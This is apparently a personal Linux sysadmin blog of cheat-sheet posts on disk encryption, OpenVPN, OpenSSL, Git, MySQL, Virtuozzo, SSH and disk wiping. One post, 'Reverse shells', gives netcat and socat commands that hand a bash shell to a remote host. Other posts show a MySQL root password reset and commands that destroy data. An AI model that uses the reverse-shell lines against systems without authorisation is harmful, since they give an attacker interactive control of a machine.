Linux Disk Encryption
November 26, 2016 — 13:04

Author: silver  Category: encryption linux  Comments: Off

Linux Disk Encrption using Device Mapper, cryptsetup frontend and Linux Unified Key Setup LUKS (on disk format).

Setup:

cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v

Test:

cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1

Change:

(asks current passphase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION

Various:

dmsetup ls --tree
lsblk
lsblk --fs
Reverse shells
November 26, 2016 — 12:45

Author: silver  Category: linux  Comments: Off

USING NETCAT:

SERVER/LISTEN:

netcat -lvp 9999

CLIENT:

netcat -e /bin/sh host.name 9999


NICER SHELL:

python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"

 


 

USING SOCAT:

SERVER/LISTEN:

socat file:`tty`,raw,echo=0 tcp-listen:8888

CLIENT:

socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane

CLIENT:

socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
export STY=
stty rows 40 cols 130
stty rows 40 cols 230
EncFS
November 25, 2016 — 22:02

Author: silver  Category: encryption linux  Comments: Off

Install on CentOS6:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git
yum install -y cmake
yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64
yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++ -y

Compile:

scl enable devtoolset-3 bash
git clone https://github.com/vgough/encfs
cd encfs
mkdir build
cd build
cmake ..
make
make test
make install
make package
mkdir ~/test
mkdir ~/Private

Test:

encfs ~/Private ~/test
echo testing > ~/test/testfile
fusermount -u ~/test
OpenVPN AS
November 25, 2016 — 21:31

Author: silver  Category: encryption linux  Comments: Off

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.

Download:

Configuration:

Clickety click in the gui, plus some hardening:

Server:

Client:

auth SHA512
cipher AES-256-CBC

Connect with SSH + SOCKS Proxy + OTP:

$ ssh -D 1 to remote host

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts//sacli --user <USER> --key prop_deny --value true UserPropPut

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

Disable:

./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 127.0.0.1 10443
(tcp mode only)

OpenSSL
November 25, 2016 — 21:26

Author: silver  Category: encryption linux  Comments: Off

List deleted open files (after update):

lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq

Generate CSR, self signed cert:

openssl genrsa -out rootCA.key 2048
openssl genrsa -des3 -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256

View CSR

openssl req -in file.csr -noout -text

View cert fingerprint

openssl x509 -fingerprint -noout -in file.crt -sha256
openssl x509 -fingerprint -noout -in file.crt -sha1
openssl x509 -fingerprint -noout -in file.crt -md5

View ciphers:

openssl ciphers -v 'TLSv1' | sort

Test ciphers:

openssl s_client -connect google.com:443 -cipher "EDH"
openssl s_client -connect google.com:443 -cipher "RC4"
openssl s_client -connect google.com:443 -tls1
openssl s_client -connect google.com:443 -tls1_1
openssl s_client -connect google.com:443 -tls1_2
echo -n | openssl s_client -connect google.com:443
nmap --script ssl-enum-ciphers -p 443

Get fingerprint from live SSL cert (IRC):

echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256

Show fingerprint:

openssl x509 -in cert.pem -fingerprint -noout

To change the password of your private key:

openssl rsa -des3 -in ca.key -out ca_new.key
mv ca_new.key ca.key

Verifying that a Private Key Matches a Certificate

$ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
openssl rsa -noout -modulus -in server.key | openssl md5

Get the MD5 fingerprint of a certificate using OpenSSL

openssl dgst -md5 certificate.der

Get the MD5 fingerprint of a CSR using OpenSSL

openssl dgst -md5 csr.der

Debug SMTP/STARTTLS:

openssl s_client -debug -starttls smtp -crlf -connect localhost:25
File Encryption
November 25, 2016 — 18:44

Author: silver  Category: encryption linux  Comments: Off

All of these are FUSE based except for eCryptfs.

Comparison: https://nuetzlich.net/gocryptfs/comparison

 

CryFS
November 25, 2016 — 18:18

Author: silver  Category: encryption linux  Comments: Off

Download:
 
http://cryfs.org
https://github.com/cryfs/cryfs
 
Compile under CentOS 6:
 

yum install https://www.softwarecollections.org/repos/denisarnaud/boost157/epel-6-x86_64/noarch/denisarnaud-boost157-epel-6-x86_64-1-2.noarch.rpm
yum install -y boost157-devel.x86_64 boost157-static.x86_64 
scl enable devtoolset-3 bash
export BOOST_ROOT=/usr/include/boost157
export BOOST_LIBRARYDIR=/usr/lib64/boost157
mkdir cmake && cd cmake
cmake ..
make
sudo make install
Serial console
November 25, 2016 — 17:14

Author: silver  Category: linux  Comments: Off

/etc/default/grub:

GRUB_CMDLINE_LINUX="video=off elevator=deadline console=tty0 console=ttyS0,115200"
GRUB_TERMINAL=serial
GRUB_SERIAL_COMMAND="serial --unit=0 --speed=115200 --stop=1"

/etc/inittab:

0:2345:respawn:/sbin/agetty -8 ttyS0 115200 vt100
Git
November 25, 2016 — 13:07

Author: silver  Category: linux  Comments: Off

Just a little cheatsheet… ;)

Start ssh-agent:

eval $( ssh-agent )
ssh-add /home/user/.ssh/id_ed25519_git
ssh -T [email protected]

Now you should be able to “git push”

New repository, using SSH:

git push origin master
git remote set-url origin [email protected]:username/repo.git
git remote add origin [email protected]:username/repo.git
git add .
git commit -m "First commit"

To change commit comment:

git commit --amend

 


 

Branches:

Clone the repository:

git clone 

List all branches:

git branch -a

Checkout the branch that you want:

git checkout git checkout checkout origin/story/sla_tooling

Adding branches:

git branch
git checkout -b branchname
git push origin branchname
git remote add branchname [email protected]:username/repo.git
git commit .
git push branchname branchname

Switch between branches:

git checkout 
git checkout master

Remove remote (no really harmful):

git remote remove

More details about branches:

Update your branch when the original branch from official repository has been updated :

$ git fetch [name_of_your_remote]

Then you need to apply to merge changes, if your branch is derivated from develop you need to do :

$ git merge [name_of_your_remote]/develop

Delete a branch on your local filesystem :

$ git branch -d [name_of_your_new_branch]

To force the deletion of local branch on your filesystem :

$ git branch -D [name_of_your_new_branch]

Delete the branch on github :

$ git push origin :[name_of_your_new_branch]

 


 

Color:

git diff --color-words
git log --color-words
git show --color-words

 

Undo:

git checkout .  # revert your changes
git clean -fdxn # dry run
git clean -xdf  # delete untracked and ignored files (!!!)

 

SHA Hash:

git hash-object 

(compare to:)
https://api.github.com/repos/user/repos/contents/file
https://api.github.com/repos/user/repos/bobs/hash

 


 

Removing sensitive data:

bfg --delete-files YOUR-FILE-WITH-SENSITIVE-DATA
bfg --replace-text passwords.txt

OR

git filter-branch --force --index-filter \
'git rm --cached --ignore-unmatch PATH-TO-YOUR-FILE-WITH-SENSITIVE-DATA' \
--prune-empty --tag-name-filter cat -- --all

(add to .gitignore)

git push origin --force --all
git push origin --force --tags
git for-each-ref --format='delete %(refname)' refs/original | git update-ref --stdin
git reflog expire --expire=now --all
git gc --prune=now

 

Working state:

Use git stash when you want to record the current state of the working directory and the index, but want to go back to a clean working directory

git stash
git stash list
git stash show
git stash show -p --color

(!) remove all states:

git stash clear

 

List remote:

git ls-remote $URL

 

Versioning:

short commit hash:

git rev-parse --short HEAD
git describe --tags --always --dirty=-dirty

 

Logs:

git log --graph --abbrev-commit --format=format:'%h - %s%d'
git log --oneline 
git log --pretty=oneline --abbrev-commit
git log --abbrev-commit
git log -1 --abbrev-commit
git log -1 --pretty=format:%h 
vi Editor
May 2, 2015 — 21:27

Author: silver  Category: bsd linux  Comments: Off

vimrc:

~/.vimrc

set number
filetype indent on
set expandtab
set shiftwidth=2
set softtabstop=2
syntax on
" set background=light
set background=dark
" colorscheme default

(” = comment)


commands:

:no paste
:set list
:set nolist

reindent:

gg=G


view/start vi readonly:

$ vi -R

xml syntax:

:set filetype=xml
:filetype indent on
gg=G


yl yank (copy) current character
yn yank n characters
yw yank the current word


run external shell command:

:!command
:!ls -la /tmp

:sh


vim visual mode:

visual line: SHIFT+V
visual block: CTRL+V


move code blocks:

on bracket/curley brace/parentheses: %


search history:

same as with ":"
press “/” then “UP” or “DOWN” key


goto column:

use "|<NUMBER>"
e.g. 80| moves to column 80


search:

to search for the word you are on
*
#


case:

to upper case, to lower case
~ (tilde)


bookmark:

set a bookmark called 'a'
ma
go to the bookmark called 'a' (the ` is the key left of 1)
`a

center:

center the screen on your current position
zz


current word:

select the current word (visual)
viw


format json:

:%!python -m json.tool

Speedtest
May 2, 2015 — 21:23

Author: silver  Category: linux  Comments: Off

Download:
https://github.com/sivel/speedtest-cli
https://pypi.python.org/pypi/speedtest-cli/


Use only NL servers:


MySQL
October 14, 2014 — 16:37

Author: silver  Category: linux windows  Comments: Off

Show databases:

mysql -u root -p -e 'show databases;'

Create new database:

CREATE database username
GRANT ALL ON username.* TO 'username'@'localhost' IDENTIFIED BY 'password';

Create admin user:

$ mysql --user=root -p mysql
CREATE USER 'admin'@'localhost' IDENTIFIED BY 'KNOWNPW';
GRANT ALL PRIVILEGES ON *.* TO 'admin'@'localhost' WITH GRANT OPTION;

Password reset root user:

Linux:

$ /etc/init.d/mysql stop
$ mysqld_safe --skip-grant-tables 
$ mysql --user=root mysql
SELECT * FROM user;
update user set Password=PASSWORD('MyNewPass') where user='root';
flush privileges;
exit
$ /etc/init.d/mysql start

Windows:

C:\mysql\bin\mysqld-nt --init-file=C:\\mysql-init.txt --console
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;

Various:

(run mysql interactively)

Set password hash:

set password for 'root'@'localhost' = '*H4SHH4SHH4SHH4SHH4SHH4SHH4SHH4SHH4SHH4SH';

Show user:

SELECT user, host FROM mysql.user WHERE user='root'

List databases/tables:

SHOW databases;
SHOW tables;

Import from cli:

source path/to/file.sql;

INSERT IF NOT EXISTS:

INSERT IGNORE INTO

Dump binary data

use option --hex-blob

LVM
July 9, 2014 — 15:09

Author: silver  Category: linux storage  Comments: Off

Resize:

vgextend vg_name /dev/sdb1
lvcreate -n /dev/VolGroup/lv_pstorage -l 100%FREE
lvresize --size -8G /dev/VolGroup/lv_root
lvresize --size -35G /dev/VolGroup/lv_vz
lvresize --size -5G /dev/VolGroup/lv_pstorage
lvresize --size +5G /dev/VolGroup/lv_vz
lvextend -l +100%FREE /dev/centos/data

(after extend: resize2fs)

Rescue:

Boot your rescue media.
Scan for volume groups:

# lvm vgscan -v

Activate all volume groups:

# lvm vgchange -a y

List logical volumes:

# lvm lvs –all

With this information, and the volumes activated, you should be able to mount the volumes:

# mount /dev/volumegroup/logicalvolume /mountpoint
GPG
January 21, 2014 — 17:45

Author: silver  Category: linux  Comments: Off

list

$ gpg --list-keys
$ gpg --list-secret-keys

check

$ gpg --local-user FFFF0000 -as

create

$ gpg
 <message>
 ^D
Shred
January 21, 2014 — 17:41

Author: silver  Category: linux  Comments: Off

shred.sh:

shred -f -n 35 -s 10M -u -v -x -z [email protected]
CentOS epel
January 21, 2014 — 17:40

Author: silver  Category: linux  Comments: Off

install

# yum install --enablerepo=elrepo-extras firefox

query

# repoquery --repoid=epel -a|xargs yum list installed
Recursive diff
January 20, 2014 — 22:36

Author: silver  Category: linux  Comments: Off
$ diff -ur --unidirectional-new-file a/bar b/bar
Device info
January 20, 2014 — 0:53

Author: silver  Category: linux  Comments: Off
# lsblk
# dmsetup ls --tree
# findmnt (debian)
# lspci
# lsusb -v
# hwinfo
Virtuozzo
January 20, 2014 — 0:44

Author: silver  Category: linux virtualization  Comments: Off

Virtuozzo virtualization (VZ):

Commands:

Create Container:

vzctl set 104 --save --ipadd 10.0.0.104/24 --hostname node104 --nameserver 8.8.8.8 --userpasswd root:node104
vzctl create 99 --ostemplate centos-6-x86_64
vzctl set 99 --save --hostname bla.eu --ipadd 1.2.3.4/24 --nameserver 8.8.8.8

Optional parameters: --diskspace 10000000 # 10GB diskspace --ram 1024M --swap 512M
UBC: physpages swappages 262144×8 = 8GB

prlctl create 101 --vmtype ct

Create VM:

ls /etc/vz/conf/dists
prlctl create MyVM --distribution win-2008 --vmtype vm

List containers:

vzlist -o ctid,hostname,ip,gw,offline_management,status,ostemplate,uptime
vzps -eo ctid,user,vpid,pid,pcpu,pmem,vsz,tty,stat,start_time,bsdtime,args

Packages:

Install/remove package in container:

vzpkg install -p 101 yum
vzpkg remove -p 101 postgresql -w

Update package cache:

vzpkg update cache centos-6-x86_64

Backup:

List on server:

# vzarestore -l -f
# vzarestore --browse xxxx-0000-0000-0000-xxxx/20140708031442 -d /dir

List vzabackups with oneliner:

Client:

# vzarestore 1207 --files /dir/file -b xxxx-0000-0000-0000-xxxx/20140708031442 --skip-ve-config --storage [email protected]

Exec:

exec ls on all ct’s on hwnode

for i in $( vzlist -Hoveid ); do vzctl exec $i ls; done

Clone container:

vzmlocal -C 101:111

Migrate container:

pmigrate c localhost/<CTID> c host2/<CTID> --online -v

Stats:

cat /proc/vz/hwid
vzstat

PCS:

Move CT:

Important! For the command to be successful, a direct SSH connection (on port 22) should be allowed between the source and destination servers.
Make sure network connection can be established from destination to the source TCP port 1622.

# prlctl migrate

VNC:

echo <vnc_password> | nohup prl_vncserver_app --auto-port --min-port 5800 --max-port 65535 --passwd <VM_UUID> &
prlctl set name --vnc-mode auto --vnc-passwd pass123
vncviewer localhost:5800 -geometry=1280x960

Parallels Tools

prlctl installtools <VM_NAME>

Windows VM:

prlctl set  --device-set cdrom0 --connect --enable --image /usr/share/parallels-server/tools/prl-tools-win.iso

Network:

vzctl set 1788 –save –netif_add eth0
vzctl set 1788 –save –ifname eth0 –network NW-NAME –gateway 10.0.0.1 –ipadd 10.0.0.10/255.255.255.0 –dhcp6 yes
prlctl set 1788 –device-add net –network NW-NAME –ipadd 10.0.0.10/255.255.255.0 –ipadd 10.0.0.11/255.255.255.0 –dhcp6 yes –gw 10.0.0.1

VZ Windows:

Fix pva agent:

echo exit > exit.cmd
for /f %i in ('vzlist -Ho veid') do vzctl enter %i < exit.cmd

bind mounts (nfs, cifs):

vzctl set 1113 --bindmount_add /vz/www:/var/www/vhosts/1,nosuid,noexec,nodev /mnt/dir1:/mnt/dir2,nosuid,noexec,nodev --save
mount -n -t simfs /vz/www /vz/root/1502/var/www/vhosts/2 -o /vz/www
SSH
January 20, 2014 — 0:42

Author: silver  Category: bsd linux  Comments: Off

SSH:

No host checking:

ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $1

No public key, use passwd

ssh -o PreferredAuthentications=keyboard-interactive -o PubkeyAuthentication=no

Tar/untar between hosts:


Multi hop tunnel:

ssh -A -t host1 \
-L 4648:localhost:4648 \
ssh -A -t host2 \
-L 4648:localhost:4648
ssh -A -t host3 \
-L 4648:localhost:4648

SSH Agent:

$ exec ssh-agent /bin/bash
$ ssh-add

-or-

eval `keychain --eval`

http://www.funtoo.org/Keychain

List fingerprints:

ssh-keygen -lf id_rsa

All keys in .ssh/authorized_keys:


Check priv/pub key:

ssh-keygen -y -f id_rsa

Change key passwd:

ssh-keygen -f id_rsa -p
Rsync
January 20, 2014 — 0:40

Author: silver  Category: linux  Comments: Off

a archive (-rlptgoD)
A preserve ACLs
c checksum
n dryrun
r recursive
v verbose

rsync -arv --delete /mnt1/backups/ /mnt1/backups/

l recreate symlinks
t preserve modification times

rsync  -v -rlt --delete /mnt1/backups/ /mnt2/backups/rsync -avte 'ssh -p 2299' /dir1/dir2/ [email protected]:/dir1/dir2/
for i in dir1 dir2 dir2; do
        rsync -avte 'ssh -i /root/rsync_id_rsa -p 2222' /source/$i/ [email protected]:/target/$i/
done
Rename user
January 20, 2014 — 0:36

Author: silver  Category: linux  Comments: Off

For some reason I always tend to forget this one and just edit /etc/passwd..

# usermod -l login-name old-name
GNU Screen
January 20, 2014 — 0:14

Author: silver  Category: linux  Comments: Off

Screenshot:

This is how my current screen config looks, I use the same config on every host but with different colors for the status bar to quickly differentiate between them.
gnuscreen

Commands:

Move window:

  • change to the window you want to move
  • type (for example) ^x:number 1
  • ^x is the host key (usually ^a on most machines)
  • :number (typed literally) is the command
  • 1 the number to move the current screen to

Save log:

CTRL+a :

hardcopy -h

-or-

CTRL+a [
CTRL+a

:bufferfile /tmp/somefile.txt

CTRL+a >

Line wrap

<pre:wrap

Scrollback:

Press CTRL-a then : and then type

scrollback 10000

to get a 10000 line buffer, for example.

You can also set the default number of scrollback lines by adding

defscrollback 10000

to your ~/.screenrc file.

Another tip: CTRL-a i shows your current buffer setting.

List windows in tab:

CTRL+a w

Reload screenrc

CTRL-a : source $HOME/.screenrc

Fix ssh-agent:

Fix
“Could not open a connection to your authentication agent.”
“The agent has no identities.”

Cause: new socket/ppid

first detach/logout, then relogin with ssh -A and resume screen

export SSH_AUTH_SOCK=/tmp/ssh-oghop19109/agent.19109

CTRL+a: setenv SSH_AUTH_SOCK /tmp/ssh-oghop19109/agent.19109

ssh-add -l

My .screenrc:

Hibernate
March 31, 2012 — 17:50

Author: silver  Category: linux  Comments: Off

2015

https://01.org/blogs/rzhang/2015/best-practice-debug-linux-suspend/hibernate-issues

Test:

echo disk > /sys/power/state
grep PM: /var/log/dmesg

Disk Encryption and hibernate

Verify resume device:

/etc/default/grub:
GRUB_CMDLINE_LINUX="resume=/dev/mapper/cryptswap1

update-grub

/etc/initramfs-tools/conf.d/resume:
RESUME=/dev/mapper/cryptswap1

sudo update-initramfs -u -k all

If it’s still not working try testing without encrypted swap (/dev/disk/by-label/swap).

2012

Hibernate under Ubuntu often doesn’t work or stops working after a dist upgrade.

There’s several method’s to hibernate (and suspend): uswsup, tuxonince etc – we won’t be using any of those here.

Steps to fix hibernate

  1. Check logs /var/log/pm-powersave.log (and /var/log/pm-suspend.log)
  2. Check if you have enough swap
  3. Try removing all connected usb devices first before hibernating (my XBOX 360 Wireless receiver stops hibernate from working, see script below)
  4. System is hibernating but not resuming? Check /etc/initramfs-tools/conf.d/resume (and do a update-initramfs -k all -u)
  5. Still not working? sudo apt-get remove hibernate uswsusp (just to be sure)
  6. More info: http://chriseiffel.com/everything-linux/step-by-step-how-to-get-hibernate-working-for-linux-ubuntu-11-04-mint-11/

This script disables all usb controllers using UHCI on hibernate and enables them on resume.

/etc/pm/sleep.d/20_custom-ehci_hcd


Wipe SSD/HDD
March 19, 2012 — 12:27

Author: silver  Category: linux other windows  Comments: Off

Linux:

First check the drive (see if erase operations are supported):

# hdparm -I /dev/X 
# hdparm --user-master u --security-set-pass Password /dev/X
# time hdparm --user-master u --security-erase Password /dev/X

or (if supported):

# time hdparm --user-master u --security-erase-enhanched Passwrd /dev/X

Works also for HDD’s.

More info:
https://ata.wiki.kernel.org/articles/a/t/a/ATA_Secure_Erase_936d.html
https://www.thomas-krenn.com/en/wiki/SSD_Secure_Erase

Alternatively boot into Parted Magic and use GUI.

Windows/DOS:

http://cmrr.ucsd.edu/people/Hughes/SecureErase.shtml








We use Matomo free and open source web analytics (opt-out)